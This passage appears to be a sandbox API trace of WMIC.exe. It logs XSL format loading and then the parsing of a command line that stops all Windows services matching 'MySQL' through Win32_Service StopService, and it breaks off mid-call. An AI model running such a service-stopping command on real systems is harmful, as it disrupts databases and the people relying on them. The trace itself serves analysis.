(param_1="wmiclitableformatnosys") returned 0x16 [0248.635] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.635] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0248.635] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.635] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0248.635] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.635] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.635] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0248.635] malloc (_Size=0x30) returned 0x3c8400 [0248.635] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.635] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.635] IUnknown:Release (This=0x216a280) returned 0x0 [0248.635] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=15, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.635] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="htable.xsl") returned 0x0 [0248.635] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.635] malloc (_Size=0x18) returned 0x3cc8e0 [0248.635] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.636] free (_Block=0x3cc8e0) [0248.636] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0248.636] malloc (_Size=0x18) returned 0x3cc8e0 [0248.636] malloc (_Size=0x18) returned 0x3cc900 [0248.636] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.636] SysStringLen (param_1="TABLE") returned 0x5 [0248.636] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.636] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.636] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.636] SysStringLen (param_1="XML") returned 0x3 [0248.636] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.636] SysStringLen (param_1="texttablewsys") returned 0xd [0248.636] SysStringLen (param_1="XML") returned 0x3 [0248.636] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.636] malloc (_Size=0x30) returned 0x3c8440 [0248.636] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.636] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.636] IUnknown:Release (This=0x216a280) returned 0x0 [0248.636] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=16, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.636] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="htable.xsl") returned 0x0 [0248.636] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.636] malloc (_Size=0x18) returned 0x3cc920 [0248.637] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.637] free (_Block=0x3cc920) [0248.637] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0248.637] malloc (_Size=0x18) returned 0x3cc920 [0248.637] malloc (_Size=0x18) returned 0x3cc940 [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] SysStringLen (param_1="TABLE") returned 0x5 [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] SysStringLen (param_1="XML") returned 0x3 [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] SysStringLen (param_1="texttablewsys") returned 0xd [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0248.638] SysStringLen (param_1="XML") returned 0x3 [0248.638] SysStringLen (param_1="htable-sortby") returned 0xd [0248.638] malloc (_Size=0x30) returned 0x3c8480 [0248.638] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.638] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.638] IUnknown:Release (This=0x216a280) returned 0x0 [0248.638] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=17, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.638] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="mof.xsl") returned 0x0 [0248.638] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.638] malloc (_Size=0x18) returned 0x3cc960 [0248.638] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.638] free (_Block=0x3cc960) [0248.638] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0248.638] malloc (_Size=0x18) returned 0x3cc960 [0248.639] malloc (_Size=0x18) returned 0x3cc980 [0248.639] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.639] SysStringLen (param_1="TABLE") returned 0x5 [0248.639] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.639] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.639] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.639] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.639] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.639] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.639] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.639] malloc (_Size=0x30) returned 0x3c84c0 [0248.639] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.639] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.639] IUnknown:Release (This=0x216a280) returned 0x0 [0248.639] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=18, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.639] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="mof.xsl") returned 0x0 [0248.639] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.639] malloc (_Size=0x18) returned 0x3cc9a0 [0248.639] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.639] free (_Block=0x3cc9a0) [0248.639] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0248.639] malloc (_Size=0x18) returned 0x3cc9a0 [0248.639] malloc (_Size=0x18) returned 0x3cc9c0 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] SysStringLen (param_1="TABLE") returned 0x5 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0248.640] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.640] SysStringLen (param_1="wmiclimofformat") returned 0xf [0248.640] malloc (_Size=0x30) returned 0x3c8500 [0248.640] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.640] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.640] IUnknown:Release (This=0x216a280) returned 0x0 [0248.640] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=19, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.640] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="textvaluelist.xsl") returned 0x0 [0248.640] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.640] malloc (_Size=0x18) returned 0x3cc9e0 [0248.640] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.640] free (_Block=0x3cc9e0) [0248.641] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0248.641] malloc (_Size=0x18) returned 0x3cc9e0 [0248.641] malloc (_Size=0x18) returned 0x3cca00 [0248.641] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.641] SysStringLen (param_1="TABLE") returned 0x5 [0248.641] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.641] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.641] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.641] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.641] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.641] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.641] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.641] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.641] malloc (_Size=0x30) returned 0x3c8540 [0248.641] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.641] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.641] IUnknown:Release (This=0x216a280) returned 0x0 [0248.641] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=20, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.641] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="textvaluelist.xsl") returned 0x0 [0248.641] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.641] malloc (_Size=0x18) returned 0x3cca20 [0248.641] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.641] free (_Block=0x3cca20) [0248.642] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0248.642] malloc (_Size=0x18) returned 0x3cca20 [0248.642] malloc (_Size=0x18) returned 0x3cca40 [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] SysStringLen (param_1="TABLE") returned 0x5 [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0248.642] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.642] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0248.642] malloc (_Size=0x30) returned 0x3c8580 [0248.642] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.642] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.642] IUnknown:Release (This=0x216a280) returned 0x0 [0248.642] IUnknown:Release (This=0x2169cc0) returned 0x0 [0248.642] FreeThreadedDOMDocument:IUnknown:Release (This=0x216bc50) returned 0x1 [0248.642] FreeThreadedDOMDocument:IUnknown:Release (This=0x21671d0) returned 0x0 [0248.642] free (_Block=0x3c6f00) [0248.642] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice" [0248.642] malloc (_Size=0xd0) returned 0x3ccd30 [0248.643] memcpy_s (in: _Destination=0x3ccd30, _DestinationSize=0xce, _Source=0x2125ee, _SourceSize=0xcc | out: _Destination=0x3ccd30) returned 0x0 [0248.643] malloc (_Size=0x18) returned 0x3cca60 [0248.643] malloc (_Size=0x18) returned 0x3cca80 [0248.643] malloc (_Size=0x18) returned 0x3ccaa0 [0248.643] malloc (_Size=0x18) returned 0x3ccac0 [0248.643] malloc (_Size=0x80) returned 0x3c6f00 [0248.643] GetLocalTime (in: lpSystemTime=0x16f530 | out: lpSystemTime=0x16f530*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x7, wMilliseconds=0x1b6)) [0248.643] _vsnwprintf (in: _Buffer=0x3c6f00, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16f488 | out: _Buffer="04-28-2020T20:42:07") returned 19 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] malloc (_Size=0x88) returned 0x3cce10 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] malloc (_Size=0x88) returned 0x3ccea0 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.643] malloc (_Size=0xa) returned 0x3ccae0 [0248.643] lstrlenW (lpString="path") returned 4 [0248.643] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0248.643] malloc (_Size=0xa) returned 0x3ccb00 [0248.643] malloc (_Size=0x8) returned 0x3c6f90 [0248.643] free (_Block=0x0) [0248.643] free (_Block=0x3ccae0) [0248.644] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.644] malloc (_Size=0x1c) returned 0x3c7110 [0248.644] lstrlenW (lpString="Win32_Service") returned 13 [0248.644] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0248.644] malloc (_Size=0x1c) returned 0x3ccf30 [0248.644] malloc (_Size=0x10) returned 0x3ccae0 [0248.644] memmove_s (in: _Destination=0x3ccae0, _DestinationSize=0x8, _Source=0x3c6f90, _SourceSize=0x8 | out: _Destination=0x3ccae0) returned 0x0 [0248.644] free (_Block=0x3c6f90) [0248.644] free (_Block=0x0) [0248.644] free (_Block=0x3c7110) [0248.644] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.644] malloc (_Size=0xc) returned 0x3ccb20 [0248.644] lstrlenW (lpString="where") returned 5 [0248.644] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0248.644] malloc (_Size=0xc) returned 0x3ccb40 [0248.644] malloc (_Size=0x18) returned 0x3ccb60 [0248.644] memmove_s (in: _Destination=0x3ccb60, _DestinationSize=0x10, _Source=0x3ccae0, _SourceSize=0x10 | out: _Destination=0x3ccb60) returned 0x0 [0248.644] free (_Block=0x3ccae0) [0248.644] free (_Block=0x0) [0248.644] free (_Block=0x3ccb20) [0248.644] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.644] malloc (_Size=0x30) returned 0x3c85c0 [0248.644] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0248.644] _wcsicmp (_String1="\"name like '%%MySQL%%'\"", _String2="\"NULL\"") returned -20 [0248.644] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0248.644] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0248.644] malloc (_Size=0x30) returned 0x3c8600 [0248.644] malloc (_Size=0x20) returned 0x3c7110 [0248.644] memmove_s (in: _Destination=0x3c7110, _DestinationSize=0x18, _Source=0x3ccb60, _SourceSize=0x18 | out: _Destination=0x3c7110) returned 0x0 [0248.644] free (_Block=0x3ccb60) [0248.645] free (_Block=0x0) [0248.645] free (_Block=0x3c85c0) [0248.645] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.645] malloc (_Size=0xa) returned 0x3ccb60 [0248.645] lstrlenW (lpString="call") returned 4 [0248.645] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0248.645] malloc (_Size=0xa) returned 0x3ccb20 [0248.645] malloc (_Size=0x30) returned 0x3c85c0 [0248.645] memmove_s (in: _Destination=0x3c85c0, _DestinationSize=0x20, _Source=0x3c7110, _SourceSize=0x20 | out: _Destination=0x3c85c0) returned 0x0 [0248.645] free (_Block=0x3c7110) [0248.645] free (_Block=0x0) [0248.645] free (_Block=0x3ccb60) [0248.645] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 67 [0248.645] malloc (_Size=0x18) returned 0x3ccb60 [0248.645] lstrlenW (lpString="stopservice") returned 11 [0248.645] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0248.645] malloc (_Size=0x18) returned 0x3ccae0 [0248.645] free (_Block=0x0) [0248.645] free (_Block=0x3ccb60) [0248.645] malloc (_Size=0x30) returned 0x3c8640 [0248.645] lstrlenW (lpString="QUIT") returned 4 [0248.645] lstrlenW (lpString="path") returned 4 [0248.645] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0248.645] lstrlenW (lpString="EXIT") returned 4 [0248.645] lstrlenW (lpString="path") returned 4 [0248.645] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0248.645] free (_Block=0x3c8640) [0248.645] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x2 [0248.646] malloc (_Size=0x30) returned 0x3c8640 [0248.646] lstrlenW (lpString="/") returned 1 [0248.646] lstrlenW (lpString="path") returned 4 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0248.646] lstrlenW (lpString="-") returned 1 [0248.646] lstrlenW (lpString="path") returned 4 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0248.646] lstrlenW (lpString="CLASS") returned 5 [0248.646] lstrlenW (lpString="path") returned 4 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0248.646] lstrlenW (lpString="PATH") returned 4 [0248.646] lstrlenW (lpString="path") returned 4 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0248.646] lstrlenW (lpString="/") returned 1 [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0248.646] lstrlenW (lpString="-") returned 1 [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.646] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.646] malloc (_Size=0x1c) returned 0x3c7110 [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.646] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.646] malloc (_Size=0x1c) returned 0x3ccf60 [0248.646] lstrlenW (lpString="Win32_Service") returned 13 [0248.647] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffda0430 | out: _String=0x0, _Context=0xffffffffffda0430) returned 0x0 [0248.647] lstrlenW (lpString="") returned 0 [0248.647] lstrlenW (lpString="WHERE") returned 5 [0248.647] lstrlenW (lpString="where") returned 5 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0248.647] lstrlenW (lpString="/") returned 1 [0248.647] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MySQL%%'", cchCount1=21, lpString2="/", cchCount2=1) returned 3 [0248.647] lstrlenW (lpString="-") returned 1 [0248.647] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MySQL%%'", cchCount1=21, lpString2="-", cchCount2=1) returned 3 [0248.647] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0248.647] malloc (_Size=0x2c) returned 0x3c8680 [0248.647] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0248.647] lstrlenW (lpString="/") returned 1 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0248.647] lstrlenW (lpString="-") returned 1 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] malloc (_Size=0xa) returned 0x3ccb60 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] lstrlenW (lpString="GET") returned 3 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0248.647] lstrlenW (lpString="LIST") returned 4 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0248.647] lstrlenW (lpString="SET") returned 3 [0248.647] lstrlenW (lpString="call") returned 4 [0248.647] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0248.647] lstrlenW (lpString="CREATE") returned 6 [0248.648] lstrlenW (lpString="call") returned 4 [0248.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0248.648] lstrlenW (lpString="CALL") returned 4 [0248.648] lstrlenW (lpString="call") returned 4 [0248.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0248.648] lstrlenW (lpString="/") returned 1 [0248.648] lstrlenW (lpString="stopservice") returned 11 [0248.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0248.648] lstrlenW (lpString="-") returned 1 [0248.648] lstrlenW (lpString="stopservice") returned 11 [0248.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0248.648] lstrlenW (lpString="stopservice") returned 11 [0248.648] malloc (_Size=0x18) returned 0x3ccb80 [0248.648] lstrlenW (lpString="stopservice") returned 11 [0248.648] ??0CHString@@QEAA@XZ () returned 0x16d0d8 [0248.648] GetCurrentThreadId () returned 0x83c [0248.648] GetCurrentThreadId () returned 0x83c [0248.648] ??0CHString@@QEAA@XZ () returned 0x16cea8 [0248.648] malloc (_Size=0x8) returned 0x3c7140 [0248.648] malloc (_Size=0x18) returned 0x3ccba0 [0248.648] malloc (_Size=0x18) returned 0x3ccbc0 [0248.648] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff702950 | out: ppNamespace=0xff702950*=0x1d03a98) returned 0x0 [0248.668] free (_Block=0x3ccbc0) [0248.668] CoSetProxyBlanket (pProxy=0x1d03a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0248.668] free (_Block=0x3c7140) [0248.668] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.668] free (_Block=0x3ccba0) [0248.668] malloc (_Size=0x18) returned 0x3ccba0 [0248.669] IWbemServices:GetObject (in: This=0x1d03a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x16d0b8*=0x0, ppCallResult=0x0 | out: ppObject=0x16d0b8*=0x1d2bfa0, ppCallResult=0x0) returned 0x0 [0248.692] free (_Block=0x3ccba0) [0248.692] IWbemClassObject:BeginMethodEnumeration (This=0x1d2bfa0, lEnumFlags=0) returned 0x0 [0248.692] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="StartService", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.693] lstrlenW (lpString="StartService") returned 12 [0248.693] lstrlenW (lpString="stopservice") returned 11 [0248.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0248.693] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0248.693] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x16d098*=0x0, ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x0 | out: pstrName=0x16d098*="StopService", ppInSignature=0x16d0a0*=0x0, ppOutSignature=0x16d0a8*=0x1d2c4a0) returned 0x0 [0248.693] lstrlenW (lpString="StopService") returned 11 [0248.693] lstrlenW (lpString="stopservice") returned 11 [0248.693] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0248.693] malloc (_Size=0x70) returned 0x3ccf90 [0248.693] ??0CHString@@QEAA@XZ () returned 0x16ca68 [0248.693] GetCurrentThreadId () returned 0x83c [0248.693] IWbemClassObject:GetNames (in: This=0x1d2c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x16ca60 | out: pNames=0x16ca60*="\x01ƀ\x08") returned 0x0 [0248.693] SafeArrayGetLBound (in: psa=0x2b4a60, nDim=0x1, plLbound=0x16ca78 | out: plLbound=0x16ca78) returned 0x0 [0248.693] SafeArrayGetUBound (in: psa=0x2b4a60, nDim=0x1, plUbound=0x16ca74 | out: plUbound=0x16ca74) returned 0x0 [0248.693] SafeArrayGetElement (in: psa=0x2b4a60, rgIndices=0x16ca54, pv=0x16ca58 | out: pv=0x16ca58) returned 0x0 [0248.693] malloc (_Size=0x48) returned 0x3cd010 [0248.694] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1d2c4a0, wszProperty="ReturnValue", ppQualSet=0x16c8a8 | out: ppQualSet=0x16c8a8*=0x1cf13b0) returned 0x0 [0248.694] malloc (_Size=0x18) returned 0x3ccba0 [0248.694] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="CIMTYPE", lFlags=0, pVal=0x16c930*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x16c930*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", 